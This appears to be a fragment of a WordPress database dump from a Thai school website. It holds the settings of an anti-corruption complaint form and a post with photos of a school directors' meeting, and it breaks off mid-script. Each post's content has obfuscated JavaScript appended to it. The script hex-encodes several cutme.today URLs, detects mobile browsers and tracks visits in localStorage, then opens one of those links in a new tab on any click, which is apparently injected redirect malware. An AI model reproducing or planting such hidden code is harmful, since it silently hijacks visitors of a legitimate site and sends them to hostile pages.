(\\u0e1e\\u0e22\\u0e32\\u0e19\\/\\u0e1a\\u0e38\\u0e04\\u0e04\\u0e25\\u0e2d\\u0e49\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e07)\",\"format\":\"simple\",\"description\":\"\\u0e16\\u0e49\\u0e32\\u0e21\\u0e35\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"15\":{\"id\":\"15\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"474\",\"field_id\":17,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"33010169@sisaketedu1.go.th\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','474-revision-v1','','','2024-08-03 22:03:41','2024-08-03 15:03:41','',474,'http://pakhaeng.ssk.in.th/?p=519',0,'revision','',0),
(520,1,'2024-08-06 08:58:35','2024-08-06 01:58:35','<!-- wp:paragraph -->\n<p>วันที่ 5 สิงหาคม กลุ่ม CEO ประจิมโนนคูณ สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 จัดประชุมสามัญ ประจำปี 2567 ณ โรงเรียนบ้านดินดำเหล่าเสนไต้ นำโดย นางเสน่หา พลโสภา ประธานกลุ่ม CEO ประจิมโนนคูณในการจัดประชุมในครั้งนี้ ได้รับเกียรติจาก นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษเขต 1 เป็นประธานพิธีเปิดในครั้งนี้ และได้มอบนโยบายในการจัดการศึกษา ของสำนักงานเขตพื้นที่ และมอบของที่ระลึกให้แก่ ผู้บริหาร คณะครู และบุคลากรทางการศึกษา เพื่อเป็นขวัญและกำลังใจแก่บุคลากรใหม่ที่ได้มาปฏิบัติหน้าที่ ในกลุ่ม CEO ประจิมโนนคูณในปีนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":523,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952085-1024x576.jpg\" alt=\"\" class=\"wp-image-523\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":522,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952101-1024x576.jpg\" alt=\"\" class=\"wp-image-522\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":524,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952108-1024x576.jpg\" alt=\"\" class=\"wp-image-524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":526,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952132-1024x576.jpg\" alt=\"\" class=\"wp-image-526\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":525,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952130-1024x576.jpg\" alt=\"\" class=\"wp-image-525\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":521,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952135-1024x576.jpg\" alt=\"\" class=\"wp-image-521\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":527,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952140-1024x576.jpg\" alt=\"\" class=\"wp-image-527\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":532,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952149-1024x576.jpg\" alt=\"\" class=\"wp-image-532\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":528,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952145-1024x576.jpg\" alt=\"\" class=\"wp-image-528\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":531,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952155-1024x576.jpg\" alt=\"\" class=\"wp-image-531\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":529,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952158-1024x576.jpg\" alt=\"\" class=\"wp-image-529\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":530,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952163-1024x576.jpg\" alt=\"\" class=\"wp-image-530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":533,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952167-1024x576.jpg\" alt=\"\" class=\"wp-image-533\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":534,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952182-1024x576.jpg\" alt=\"\" class=\"wp-image-534\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":535,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__68952183-1024x576.jpg\" alt=\"\" class=\"wp-image-535\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 